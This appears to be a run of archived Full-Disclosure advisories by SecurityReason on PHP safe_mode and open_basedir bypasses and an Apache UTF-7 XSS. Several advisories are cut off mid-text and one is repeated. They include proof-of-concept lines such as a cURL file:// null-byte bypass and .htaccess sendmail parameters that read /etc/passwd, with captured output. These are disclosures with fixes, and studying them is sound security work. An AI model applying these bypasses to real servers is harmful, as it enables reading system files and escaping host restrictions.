iD8DBQFH4px5W1OhNJH6DMURAmHUAJ4hUxGFzSo8vqCH5QmR17uL5G4HdACfSFiI w6hfbKzpzFcipScHzuATSME= =suIH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.5 cURL safe_mode bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.5 cURL safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - Written: 21.08.2007 - - Public: 22.01.2008 SecurityReason Research SecurityAlert Id: 51 CVE: CVE-2007-4850 SecurityRisk: Medium Affected Software: PHP 5.2.4 and 5.2.5 Advisory URL: http://securityreason.com/achievement_securityalert/51 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. These functions have been added in PHP 4.0.2. - --- 1. cURL --- This is very similar to CVE-2006-2563. http://securityreason.com/achievement_securityalert/39 The first issue [SAFE_MODE bypass] var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); is caused by error in curl/interface.c - --- #define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret) \ if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) && \ strncasecmp(str, "file:", sizeof("file:") - 1) == 0) \ { \ php_url *tmp_url; \ \ if (!(tmp_url = php_url_parse_ex(str, len))) { \ php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str); \ php_curl_ret(__ret); \ } \ \ if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) { \ php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s' contains unencoded control characters", str); \ php_url_free(tmp_url); \ php_curl_ret(__ret); \ } \ \ if (tmp_url->query || tmp_url->fragment || php_check_open_basedir(tmp_url->path TSRMLS_CC) || \ (PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+", CHECKUID_CHECK_MODE_PARAM)) \ ) { \ php_url_free(tmp_url); \ php_curl_ret(__ret); \ }
[Full-disclosure] PHP 5.2.4 mail.force_extra_parameters unsecure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.4 mail.force_extra_parameters unsecure ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - Written: 06.09.2007 - - Public: 0x.0x.2007 SecurityReason Research SecurityAlert Id: 47 CVE: CVE-2007-3378 SecurityRisk: Medium Affected Software: PHP <= 5.2.4 Advisory URL: http://securityreason.com/achievement_securityalert/47 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters --- We have recrived a lot of question about news http://securityreason.com/news/0/0x1f . And we will show How to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. But it is possible to bypass a safe_mode or open_basedir per mail.force_extra_parameters. In a lot of servers is sendmail, can be also exim etc. But we show how to exploit this for a famous mail server (SENDMAIL). For example you can set mail.force_extra_parameters via .htaccess. cxib# curl -I http://localhost:82 HTTP/1.1 200 OK Date: Thu, 06 Sep 2007 22:18:35 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4 Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT ETag: "27e4f0-2c-4c23b600" Accept-Ranges: bytes Content-Length: 44 Content-Type: text/html Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82. cxib# ls -la total 10 drwxrwxrwx 2 www www 512 Sep 7 00:26 . drwxr-xr-x 4 www wheel 512 Sep 7 00:22 .. - -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess - -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php - -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php cxib# cat file1.php cxib# curl http://localhost:82/narkotyk/file1.php Warning: include() [function.include]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in /usr/local/www/apache22/data/narkotyk/file1.php on line 1 Warning: include(/etc/passwd) [function.include]: failed to open stream: Invalid argument in /usr/local/www/apache22/data/narkotyk/file1.php on line 1 Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/local/www/apache22/data/narkotyk/file1.php on line 1 so safe_mode is open. Let's see files .htaccess and file2.php cxib# cat file2.php cxib# cat .htaccess php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt' and let's send request to file2.php cxib# curl http://localhost:82/narkotyk/file2.php bool(false) False!? No cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt - -rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt cxib# result.txt has been created. cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt 69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh" 69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:" etc. We can read file and safe_mode and open_basedir is bypassed. It is possible create file with php code. But we need have sendmail.cf to send email. Example: cxib# cat .htaccess php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php' cxib# cat file3.php allo", "root")); ?> We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure this file. Then cxib# curl http://localhost:8
[Full-disclosure] Apache2 Undefined Charset UTF-7 XSS Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [Apache2 Undefined Charset UTF-7 XSS Vulnerability ] Author: SecurityReason Maksymilian Arciemowicz (cXIb8O3) Date: - - Written: 08.08.2007 - - Public: 11.09.2007 SecurityReason Research SecurityAlert Id: 46 CVE: CVE-2007-4465 SecurityRisk: Low Affected Software: Apache 2.x (mod_autoindex) Advisory URL: http://securityreason.com/achievement_securityalert/46 Vendor: http://httpd.apache.org - --- 0.Description --- The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Apache has been the most popular web server on the Internet since April 1996. The November 2005 Netcraft Web Server Survey found that more than 70% of the web sites on the Internet are using Apache, thus making it more widely used than all other web servers combined. - --- 1. Apache2 XSS Undefined Charset UTF-7 XSS Vulnerability --- The XSS(UTF7) exist in mod_autoindex.c . Charset is not defined and we can provide XSS attack using "P" option available in apache 2.2.4 by setting Charset to UTF-7. "P=pattern lists only files matching the given pattern" More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html - -Source code from mod_autoindex.c-- #if APR_HAS_UNICODE_FS ap_set_content_type(r, "text/html;charset=utf-8"); #else ap_set_content_type(r, "text/html"); #endif - -Source code from mod_autoindex.c-- if APR_HAS_UNICODE_FS is set to 1 then we have defined charset and this is present on Windows systems . But on on unix , linux systems the charset is not definded. - --- EXAMPLE 1 --- # telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]' GET /icons/ http/1.1 Host: localhost Content-type: text/html Keep-Alive: 300 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 09 Aug 2007 01:01:48 GMT Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html Index of /icons Index of /icons .. - --- EXAMPLE 1 --- - --- EXAMPLE 2 --- # telnet httpd.apache.org 80 Trying 140.211.11.130... Connected to httpd.apache.org. Escape character is '^]'. GET /icons/ http/1.1 Host: httpd.apache.org Content-type: text/html Keep-Alive: 300 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 08 Aug 2007 23:06:26 GMT Server: Apache/2.3.0-dev (Unix) Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html Index of /icons Index of /icons .. - --- EXAMPLE 2 --- Any request to folder /icons don't give charset in main header and in section. In requests like 400 404 etc charset is defined (standard UTF8). For example : - --- EXAMPLE 3 (400) --- # telnet 127.0.0.1 80 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. GET /%0 HTTP/1.1 Host: localhost HTTP/1.1 400 Bad Request Date: Thu, 09 Aug 2007 13:13:32 GMT Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 .. - --- EXAMPLE 3 --- - --- EXAMPLE 4 (404) --- # telnet 127.0.0.1 80 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. GET /noex HTTP/1.1 Host: localhost HTTP/1.1 404 Not Found Date: Thu, 09 Aug 2007 13:14:48 GMT Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 .. - --- EXAMPLE 4 --- Any request from family 4xx is defined with charset. Because it is possible put the text to site (like wrong patch) in 404. Main idea was that, anybody can't put any text to this site with folder. And it was good idea, but in apache 2.x exist option "P". Like: http://localhost/icons/?P=[Filter] Any value gived to this variable is displayed in html text. For example : http://localhost/icons/?P=Hallo - --- HTML Name - - - --- 2. Exploit --- SecurityReason is not going to release a exploit to the general public. Exploit was provided and tested for Apache Team . - --- 3. How to fix --- Update to Apache 2.2.6 http://www.apache.org/dist/httpd/CHANGES_2.2.6 - --- mod_autoindex: Add in Type and Charset options to IndexOptions directive. This allows the admin to explicitly set the content-type and charset of the generated page and is therefore a viable workaround for buggy browsers affected by CVE-2007-4465 (cve.mitre.org). [Jim Jagielski] - --- - --- 4. Greets --- For: sp3x, Infospec, p_e_a - --- 5. Contact --- Author: Securi
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
Source: http://securityreason.com/achievement_securityalert/45 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - Written: 10.02.2007 - - Public: 27.06.2007 SecurityReason Research SecurityAlert Id: 45 CVE: CVE-2007-3378 SecurityRisk: High Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7 Advisory URL: http://securityreason.com/achievement_securityalert/45 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 2 Warning: session_start() [function.session-start]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 3 Fatal error: session_start() [<a href='function.session-start'>function.session-start</a>]: Failed to initialize storage module: files (path: ) in /www/cxib/stars.php on line 3 Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - --- php_value session.save_path /inne - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - -rw-r--r-- 1 cxib www34 Feb 16 20:26 .htaccess - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls -la /inne total 3 drwxrwxrwx 2 root wheel 512 Feb 16 20:30 . drwxr-xr
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Source: http://securityreason.com/achievement_securityalert/45 - -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - - Written: 10.02.2007 - - - Public: 27.06.2007 SecurityReason Research SecurityAlert Id: 45 CVE: CVE-2007-3378 SecurityRisk: High Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7 Advisory URL: http://securityreason.com/achievement_securityalert/45 Vendor: http://www.php.net - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 2 Warning: session_start() [function.session-start]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 3 Fatal error: session_start() [<a href='function.session-start'>function.session-start</a>]: Failed to initialize storage module: files (path: ) in /www/cxib/stars.php on line 3 Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - - --- php_value session.save_path /inne - - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - - -rw-r--r-- 1 cxib www34 Feb 16 20:26 .htaccess - - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls -la /inne total 3 drwxrwxrwx 2 r
[Full-disclosure] PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.0 session.save_path safe_mode and open_basedir bypass] Author: Maksymilian Arciemowicz (SecurityReason) Date: - - Written: 02.10.2006 - - Public: 08.12.2006 SecurityAlert Id: 43 CVE: CVE-2006-6383 SecurityRisk: High Affected Software: PHP 5.2.0 Advisory URL: http://securityreason.com/achievement_securityalert/43 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. Session support in PHP consists of a way to preserve certain data across subsequent accesses. This enables you to build more customized applications and increase the appeal of your web site. A visitor accessing your web site is assigned a unique id, the so-called session id. This is either stored in a cookie on the user side or is propagated in the URL. session.save_path defines the argument which is passed to the save handler. If you choose the default files handler, this is the path where the files are created. Defaults to /tmp. See also session_save_path(). There is an optional N argument to this directive that determines the number of directory levels your session files will be spread around in. For example, setting to '5;/tmp' may end up creating a session file and location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you must create all of these directories before use. A small shell script exists in ext/session to do this, it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic garbage collection will not be performed, see a copy of php.ini for further information. Also, if you use N, be sure to surround session.save_path in "quotes" because the separator (;) is also used for comments in php.ini. - --- 1. session.save_path safe mode and open basedir bypass --- session.save_path can be set in ini_set(), session_save_path() function. In session.save_path there must be path where you will save yours tmp file. But syntax for session.save_path can be: [/PATH] OR [N;/PATH] N - can be a string. EXAMPLES: 1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS") 2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS") and 3. session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS") - -1477-1493--- Code from PHP520 ext/session/session.c [START] PHP_FUNCTION(session_save_path) { zval **p_name; int ac = ZEND_NUM_ARGS(); char *old; if (ac < 0 || ac > 1 || zend_get_parameters_ex(ac, &p_name) == FAILURE) WRONG_PARAM_COUNT; old = estrdup(PS(save_path)); if (ac == 1) { convert_to_string_ex(p_name); zend_alter_ini_entry("session.save_path", sizeof("session.save_path"), Z_STRVAL_PP(p_name), Z_STRLEN_PP(p_name), PHP_INI_USER, PHP_INI_STAGE_RUNTIME); } RETVAL_STRING(old, 0); } - -1477-1493--- Code from PHP520 ext/session/session.c [END] Values are set to hash_memory (but before that, safe_mode and open_basedir check this value). And if you are starting session (for example session_start()), that value from session.save_path is checked by function PS_OPEN_FUNC(files). - -242-300--- Code from PHP520 ext/session/mod_files.c [START] PS_OPEN_FUNC(files) { ps_files *data; const char *p, *last; const char *argv[3]; int argc = 0; size_t dirdepth = 0; int filemode = 0600; if (*save_path == '\0') { /* if save path is an empty string, determine the temporary dir */ save_path = php_get_temporary_directory(); } /* split up input parameter */ last = save_path; p = strchr(save_path, ';'); while (p) { argv[argc++] = last; last = ++p; p = strchr(p, ';'); if (argc > 1) break; } argv[argc++] = last; if (argc > 1) { errno = 0; dirdepth = (size_t) strtol(argv[0], NULL, 10); if (errno == ERANGE) { php_error(E_WARNING, "The first parameter in session.save_path is invalid"); return FAILURE; } } if (argc > 2) { errno = 0; filemode = strtol(arg
[Full-disclosure] PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()
Source: http://securityreason.com/achievement_securityalert/42 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - - Written: 05.09.2006 - - Public: 09.09.2006 SecurityAlert Id: 42 CVE: CVE-2006-4625 SecurityRisk: High Affected Software: PHP 5.1.6 / 4.4.4 < = x Advisory URL: http://securityreason.com/achievement_securityalert/42 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. php_admin_value name value Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value. php_admin_flag name on|off Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag can not be overridden by .htaccess or virtualhost directives. http://pl.php.net/manual/en/configuration.changes.php - --- 1. php_admin_value and php_admin_flag Bypass --- When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options. For example: open_basedir in httpd.conf - --- Options FollowSymLinks MultiViews Indexes AllowOverride None php_admin_flag safe_mode 1 php_admin_value open_basedir /usr/home/frajer/public_html/ - --- In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get() Example: If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore Master Value to Local Value per ini_restore() function! - --- ini_restore (PHP 4, PHP 5) ini_restore -- Restores the value of a configuration option - --- Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed. EXPLOIT: - --- - --- RESULT OF EXPLOIT: - --- 1 /usr/home/frajer/public_html/ Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4 Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /usr/home/frajer/public_html/ini_restore.php on line 4 Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/home/frajer/public_html/ini_restore.php on line 4 # $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag. - --- This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users. - --- 2. How to fix --- fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4. http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, l5x - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg Regards SecurityReason -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a SvP3KPhmLtZcCNFmtGa8oJ8= =bqQV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/41 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 10.6.2006 - -Public: 26.06.2006 from SECURITYREASON.COM CVE-2006-3011 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. error_log -- Send an error message somewhere. - --- 1. error_log() Safe Mode Bypass --- error_log() function send to email, file or display your error message. You can send error messages per mail or write into files. Issue is very simple. error_log() check safe_mode and open_basedir in stream function. But isn't allowed use URL. And problem exists in incorrect filename. PHP5: - -2013-2050--- PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC) { php_stream *stream = NULL; switch (opt_err) { case 1: /*send an email */ { #if HAVE_SENDMAIL if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) { return FAILURE; } #else php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!"); return FAILURE; #endif } break; case 2: /*send to an address */ php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!"); return FAILURE; break; case 3: /*save to a file */ stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); if (!stream) return FAILURE; php_stream_write(stream, message, strlen(message)); php_stream_close(stream); break; default: php_log_err(message TSRMLS_CC); break; } return SUCCESS; } - -2013-2050--- Let's see to option 3. - -2038 line--- stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); - -2038 line--- Option "a", writte to file error or if file dosen't exists, create new file. Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL". IGNORE_URL turn off safe_mode if you use "prefix://../../". - -Example--- cxib# php -r 'error_log("", 3, "/www/temp/sr.php");' Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1 Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1 cxib# php -r 'error_log("", 3, 